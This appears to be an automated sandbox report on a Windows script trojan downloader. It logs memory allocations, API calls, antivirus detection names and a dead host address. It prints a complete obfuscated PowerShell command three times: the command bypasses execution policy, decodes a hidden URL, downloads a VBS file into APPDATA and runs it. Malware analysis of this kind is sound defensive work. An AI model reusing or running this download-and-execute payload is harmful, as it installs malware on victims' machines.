stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 316
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function NA($iBDUWveK, $kacHvkg){[IO.File]::WriteAllBytes($iBDUWveK, $kacHvkg)};function O($iBDUWveK){if($iBDUWveK.EndsWith((ct @(340,394,402,402))) -eq $True){Start-Process (ct @(408,411,404,394,402,402,345,344,340,395,414,395)) $iBDUWveK}else{Start-Process $iBDUWveK}};function a($wRoPwidyD){$ZUycrAxw = New-Object (ct @(372,395,410,340,381,395,392,361,402,399,395,404,410));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kacHvkg = $ZUycrAxw.DownloadData($wRoPwidyD);return $kacHvkg};function ct($koLce){$GYtomjgIU=294;$CfUes=$Null;foreach($orCECxg in $koLce){$CfUes+=[char]($orCECxg-$GYtomjgIU)};return $CfUes};function Lbu(){$Xr = $env:APPDATA + '\';$M = a (ct @(398,410,410,406,409,352,341,341,403,415,396,399,402,395,412,399,395,413,343,340,393,405,403,341,410,405,394,391,415,340,412,392,409));$h = $Xr + 'today.vbs';NA $h $M;O $h;;;;}Lbu;
cmdline powershell.exe -ExecutionPolicy UnRestricted function NA($iBDUWveK, $kacHvkg){[IO.File]::WriteAllBytes($iBDUWveK, $kacHvkg)};function O($iBDUWveK){if($iBDUWveK.EndsWith((ct @(340,394,402,402))) -eq $True){Start-Process (ct @(408,411,404,394,402,402,345,344,340,395,414,395)) $iBDUWveK}else{Start-Process $iBDUWveK}};function a($wRoPwidyD){$ZUycrAxw = New-Object (ct @(372,395,410,340,381,395,392,361,402,399,395,404,410));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kacHvkg = $ZUycrAxw.DownloadData($wRoPwidyD);return $kacHvkg};function ct($koLce){$GYtomjgIU=294;$CfUes=$Null;foreach($orCECxg in $koLce){$CfUes+=[char]($orCECxg-$GYtomjgIU)};return $CfUes};function Lbu(){$Xr = $env:APPDATA + '\';$M = a (ct @(398,410,410,406,409,352,341,341,403,415,396,399,402,395,412,399,395,413,343,340,393,405,403,341,410,405,394,391,415,340,412,392,409));$h = $Xr + 'today.vbs';NA $h $M;O $h;;;;}Lbu;
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function NA($iBDUWveK, $kacHvkg){[IO.File]::WriteAllBytes($iBDUWveK, $kacHvkg)};function O($iBDUWveK){if($iBDUWveK.EndsWith((ct @(340,394,402,402))) -eq $True){Start-Process (ct @(408,411,404,394,402,402,345,344,340,395,414,395)) $iBDUWveK}else{Start-Process $iBDUWveK}};function a($wRoPwidyD){$ZUycrAxw = New-Object (ct @(372,395,410,340,381,395,392,361,402,399,395,404,410));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kacHvkg = $ZUycrAxw.DownloadData($wRoPwidyD);return $kacHvkg};function ct($koLce){$GYtomjgIU=294;$CfUes=$Null;foreach($orCECxg in $koLce){$CfUes+=[char]($orCECxg-$GYtomjgIU)};return $CfUes};function Lbu(){$Xr = $env:APPDATA + '\';$M = a (ct @(398,410,410,406,409,352,341,341,403,415,396,399,402,395,412,399,395,413,343,340,393,405,403,341,410,405,394,391,415,340,412,392,409));$h = $Xr + 'today.vbs';NA $h $M;O $h;;;;}Lbu;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Symantec Scr.Malscript!gen11
ESET-NOD32 VBS/TrojanDownloader.Agent.XAO
NANO-Antivirus Trojan.Script.Downloader.jpdglv
Ikarus Trojan.Script.Agent
Jiangmin Trojan.Script.amhb
Google Detected
Kingsoft hta.Troj.2024093
Microsoft Trojan:Script/Wacatac.B!ml
GData HTML.Trojan.Agent.OW4WSG
Tencent Vbs.Trojan-Downloader.Der.Jajl
huorong HEUR:Trojan/PS.Agent.am
alibabacloud Trojan[downloader]:Win/Agent.XMX
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\today.vbs
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
dead_host 195.66.213.164:443